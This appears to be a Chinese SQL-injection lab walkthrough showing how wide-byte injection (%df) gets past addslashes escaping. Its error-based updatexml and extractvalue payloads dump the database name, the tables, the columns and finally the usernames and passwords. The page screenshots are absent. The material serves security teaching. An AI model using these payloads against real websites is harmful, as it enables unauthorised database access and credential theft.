绕过向危险字符添加斜杠的加法器
1、尝试正常注入
输入语句
?id=1\
,返回页面如下:
发现自动在危险字符前面添加斜杠。
2、中和干扰符
输入语句
?id=1%df\
,返回页面如下:
干扰成功,反斜杠逃逸成功。
在返回的错误信息中,我们发现在反斜杠的后面是单引号。所以该网站的闭合方式是单引号。
3、爆破数据库、用户名、版本
输入语句?
id=1%df' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,version(),0x7e),1) --+
,返回页面如下:
4、爆破数据表名
输入语句
?id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) --+
,返回页面如下:
5、爆破字段名
输入语句
?id=1%df' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),0x7e),1) --+
,返回页面如下:
6、爆破字段内容
输入语句
?id=1%df' and extractvalue(1,concat(0x7e,(select group_concat(concat(id,0x7e,username,0x7e,password)) from users),0x7e)) --+
,返回页面如下:
我们发现返回的内容不完整,我们将语句改为:
?id=1%df' and extractvalue(1,concat(0x7e,mid((select group_concat(concat(id,0x7e,username,0x7e,password)) from users),32,32),0x7e)) --+
,返回页面如下: